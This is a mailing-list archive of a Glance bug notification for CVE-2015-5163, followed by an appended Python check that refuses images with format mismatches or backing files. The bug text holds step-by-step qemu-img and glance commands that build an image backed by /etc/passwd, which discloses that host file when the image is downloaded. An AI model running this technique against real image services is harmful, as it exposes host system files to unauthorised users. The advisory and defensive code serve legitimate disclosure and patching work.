yahoo-eng-team team mailing list archive
Message #45034
[Bug 1471912] Re: [OSSA 2015-014] Format-guessing and file disclosure via image conversion (CVE-2015-5163)
** Also affects: glance/kilo
Importance: Undecided
Status: New
** Changed in: glance/kilo
Status: New => Fix Committed
** Changed in: glance/kilo
Milestone: None => 2015.1.3
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1471912
Title:
[OSSA 2015-014] Format-guessing and file disclosure via image
conversion (CVE-2015-5163)
Status in Glance:
Fix Released
Status in Glance kilo series:
Fix Committed
Status in OpenStack Security Advisory:
Fix Released
Bug description:
This is a security flaw that allows files from the Glance host to be
obtained by a user.
I'm using the Glance file store and have set in /etc/glance/glance-api.conf:
[taskflow_executor]
engine_mode=serial # not sure if needed
conversion_format=raw
Make a malicious image available via HTTP.
$ sudo qemu-img create -f qcow2 /var/www/html/test_image 1M
$ sudo qemu-img rebase -u -b /etc/passwd /var/www/html/test_image
$ glance --os-image-api-version 2 task-create --type import --input '{"import_from_format": "qcow2", "import_from": "http://127.0.0.1/test_image", "image_properties": {"name": "my_image_test", "disk_format": "qcow2", "container_format": "bare"}}'
$ glance image-download my_image_test --file downloaded_image
$ head downloaded_image
<contents from /etc/passwd on the Glance host>
This happens because Glance runs this command, which doesn't specify a format and so uses qemu-img's format auto-detection:
qemu-img convert -O raw file:///tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4 /tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4.converted
Similar to Cinder bug 1415087.
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1471912/+subscriptions
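A defender-side check for the conversion step the bug describes, added here as an example and not code from Glance or from the bug report: it inspects `qemu-img info --output=json` output before conversion, refusing a probed/declared format mismatch or any backing file, and builds the convert command with an explicit `-f`. The JSON samples, paths and function names are constructed for this example.

```python
import json

# Constructed sample of `qemu-img info --output=json` for an image built the
# way the report describes: a qcow2 rebased onto /etc/passwd as backing file.
MALICIOUS_INFO = json.dumps({
    "virtual-size": 1048576,
    "filename": "/tmp/test_image",
    "format": "qcow2",
    "actual-size": 196616,
    "backing-filename": "/etc/passwd",
})

# Constructed sample for a benign image that really is what it claims to be.
BENIGN_INFO = json.dumps({
    "virtual-size": 1048576,
    "filename": "/tmp/benign_image",
    "format": "raw",
    "actual-size": 1048576,
})


def image_problem(info_json, declared_format):
    """Return None if the image may be converted, else the reason to refuse.

    Two refusals: the format qemu-img probed must equal the format the user
    declared (so a "raw" upload cannot secretly be qcow2), and the image must
    not reference a backing file. The second check is the one that stops the
    report's image: with a declared qcow2, passing -f alone does not help,
    because qemu-img still opens the backing path on the Glance host.
    """
    info = json.loads(info_json)
    probed = info.get("format")
    if probed != declared_format:
        return "declared %s but qemu-img probed %s" % (declared_format, probed)
    backing = info.get("backing-filename")
    if backing:
        return "backing file not allowed: %s" % backing
    return None


def convert_command(src, dst, src_format, out_format):
    """Build the convert command with an explicit input format (-f) so
    qemu-img never content-sniffs untrusted data; call image_problem first."""
    return ["qemu-img", "convert", "-f", src_format, "-O", out_format, src, dst]
```

Run `qemu-img info --output=json` on the downloaded file, pass its stdout and the user's declared format to image_problem, and only build and run convert_command when it returns None.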